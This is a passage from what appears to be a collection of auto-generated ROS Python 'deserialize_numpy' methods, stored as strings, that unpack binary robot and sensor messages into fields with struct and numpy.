'<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort_command = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.accelerometer = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.accelerometer.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gyro = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.gyro.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.orientation = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Quaternion()\n _x = val1\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n 
self.orientation.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection_velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_current = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_current = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_sensor_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_housing_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.board_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.processor_temperature = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.voltage = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.led_color = []\n for i in range(0, length):\n val1 = std_msgs.msg.ColorRGBA()\n _x = val1\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n self.led_color.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.sequence_number = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.receive_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = 
'<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.transmit_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_receive_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_transmit_time = numpy.frombuffer(str[start:end], dtype=numpy.uint64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 8\n (self.time,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qdd_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.m_target = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_actual = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_acc_values = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_force = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_vector = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = 
'<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_speed = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 8\n (self.digital_input_bits,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_temperatures = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n _x = self\n start = end\n end += 24\n (_x.controller_timer, _x.test_value, _x.robot_mode,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.joint_modes = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_u = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_v = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n return self\n 
except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.sensor_FL is None:\n self.sensor_FL = sensor_msgs.msg.Range()\n if self.sensor_FR is None:\n self.sensor_FR = sensor_msgs.msg.Range()\n if self.sensor_RR is None:\n self.sensor_RR = sensor_msgs.msg.Range()\n if self.sensor_RL is None:\n self.sensor_RL = sensor_msgs.msg.Range()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.sensor_FL.header.seq, _x.sensor_FL.header.stamp.secs, _x.sensor_FL.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_FL.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_FL.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_FL.radiation_type, _x.sensor_FL.field_of_view, _x.sensor_FL.min_range, _x.sensor_FL.max_range, _x.sensor_FL.range, _x.sensor_FR.header.seq, _x.sensor_FR.header.stamp.secs, _x.sensor_FR.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_FR.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_FR.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_FR.radiation_type, _x.sensor_FR.field_of_view, _x.sensor_FR.min_range, _x.sensor_FR.max_range, _x.sensor_FR.range, _x.sensor_RR.header.seq, _x.sensor_RR.header.stamp.secs, _x.sensor_RR.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_RR.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_RR.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 29\n (_x.sensor_RR.radiation_type, _x.sensor_RR.field_of_view, _x.sensor_RR.min_range, _x.sensor_RR.max_range, _x.sensor_RR.range, _x.sensor_RL.header.seq, _x.sensor_RL.header.stamp.secs, _x.sensor_RL.header.stamp.nsecs,) = _get_struct_B4f3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.sensor_RL.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.sensor_RL.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 17\n (_x.sensor_RL.radiation_type, _x.sensor_RL.field_of_view, _x.sensor_RL.min_range, _x.sensor_RL.max_range, _x.sensor_RL.range,) = _get_struct_B4f().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.line is None:\n self.line = None\n if self.circle is None:\n self.circle = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.line = []\n for i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Line()\n _x = val1\n start = end\n end += 20\n (_x.x1, _x.y1, _x.x2, _x.y2, _x.color,) = _get_struct_4if().unpack(str[start:end])\n self.line.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.circle = []\n for 
i in range(0, length):\n val1 = krssg_ssl_msgs.msg.sslDebug_Circle()\n _x = val1\n start = end\n end += 16\n (_x.x, _x.y, _x.radius, _x.color,) = _get_struct_3if().unpack(str[start:end])\n self.circle.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (self.yaw,) = _struct_f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.objects is None:\n self.objects = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = vision_msgs.msg.ClassifiedObject()\n _v10 = val1.header\n start = end\n end += 4\n (_v10.seq,) = _struct_I.unpack(str[start:end])\n _v11 = _v10.stamp\n _x = _v11\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v10.frame_id = str[start:end].decode('utf-8')\n else:\n _v10.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object_class = str[start:end].decode('utf-8')\n else:\n val1.object_class = str[start:end]\n start = end\n end += 4\n (val1.confidence,) = _struct_f.unpack(str[start:end])\n _v12 = val1.roi\n _x = _v12\n start = end\n end += 17\n (_x.x_offset, _x.y_offset, _x.height, _x.width, _x.do_rectify,) = _struct_4IB.unpack(str[start:end])\n _v12.do_rectify = bool(_v12.do_rectify)\n self.objects.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 24\n (_x.major_ax, _x.minor_ax, _x.coup_strength, _x.limit_cycle, _x.forward_velocity, _x.curvature,) = _struct_6f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.x_offset = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.y_offset = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_1 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_2 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_3 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_4 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n 
(length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_5 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%si'%length\n start = end\n end += struct.calcsize(pattern)\n self.coupling_6 = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = None\n if self.ballinfo is None:\n self.ballinfo = None\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.obstacleinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.obstacleinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.polar_pos.append(val1)\n _x = self\n start = end\n end += 12\n (_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.oppinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.oppinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.polar_pos.append(val1)\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n self.robotinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.RobotInfo()\n _v34 = val1.header\n start = end\n end += 4\n (_v34.seq,) = _get_struct_I().unpack(str[start:end])\n _v35 = _v34.stamp\n _x = _v35\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v34.frame_id = str[start:end].decode('utf-8')\n else:\n _v34.frame_id = str[start:end]\n _x = val1\n start = end\n end += 28\n (_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum,) = _get_struct_7i().unpack(str[start:end])\n _v36 = val1.pos\n _x = _v36\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v37 = val1.heading\n start = end\n end += 4\n (_v37.theta,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (val1.vrot,) = _get_struct_f().unpack(str[start:end])\n _v38 = val1.vtrans\n _x = _v38\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 9\n (_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time,) = _get_struct_5Bf().unpack(str[start:end])\n val1.iskick = bool(val1.iskick)\n val1.isvalid = bool(val1.isvalid)\n val1.isstuck = bool(val1.isstuck)\n val1.isdribble = bool(val1.isdribble)\n _v39 = val1.target\n _x = _v39\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.robotinfo.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.ballinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.BallInfo()\n _v40 = val1.header\n start = end\n end += 4\n (_v40.seq,) = _get_struct_I().unpack(str[start:end])\n _v41 = _v40.stamp\n _x = _v41\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v40.frame_id = str[start:end].decode('utf-8')\n else:\n _v40.frame_id = str[start:end]\n start = end\n end += 4\n (val1.ballinfostate,) = _get_struct_i().unpack(str[start:end])\n _v42 = val1.pos\n _x = _v42\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v43 = val1.real_pos\n _x = _v43\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n _v44 = val1.velocity\n _x = _v44\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 2\n (_x.pos_known, _x.velocity_known,) = _get_struct_2B().unpack(str[start:end])\n val1.pos_known = bool(val1.pos_known)\n val1.velocity_known = bool(val1.velocity_known)\n self.ballinfo.append(val1)\n _x = self\n start = end\n end += 12\n (_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.coachinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.coachinfo.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 54\n (_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, 
_x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, _x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid,) = _get_struct_3B4f2h3B2I4f4B().unpack(str[start:end])\n self.pass_cmd.is_passout = bool(self.pass_cmd.is_passout)\n self.pass_cmd.is_dynamic_pass = bool(self.pass_cmd.is_dynamic_pass)\n self.pass_cmd.is_static_pass = bool(self.pass_cmd.is_static_pass)\n self.pass_cmd.is_valid = bool(self.pass_cmd.is_valid)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 2580\n self.Rscanpose = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=645)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.home is None:\n self.home = flyaq.msg.Coordinate()\n if self.movements is None:\n self.movements = None\n if self.move_transitions is None:\n self.move_transitions = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type_name = str[start:end].decode('utf-8')\n else:\n self.type_name = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.home.latitude, _x.home.longitude, _x.home.altitude, _x.home.heading,) = _struct_4f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.movements = []\n for i in range(0, length):\n val1 = flyaq.msg.Move()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 1\n (val1.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.pre_actions = []\n for i in range(0, length):\n val2 = flyaq.msg.Action()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 1\n (val2.type,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.action_name = str[start:end].decode('utf-8')\n else:\n val2.action_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val2.parameters = []\n for i in range(0, length):\n val3 = flyaq.msg.Parameter()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.key = str[start:end].decode('utf-8')\n else:\n val3.key = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val3.value = str[start:end].decode('utf-8')\n else:\n val3.value = str[start:end]\n val2.parameters.append(val3)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if 
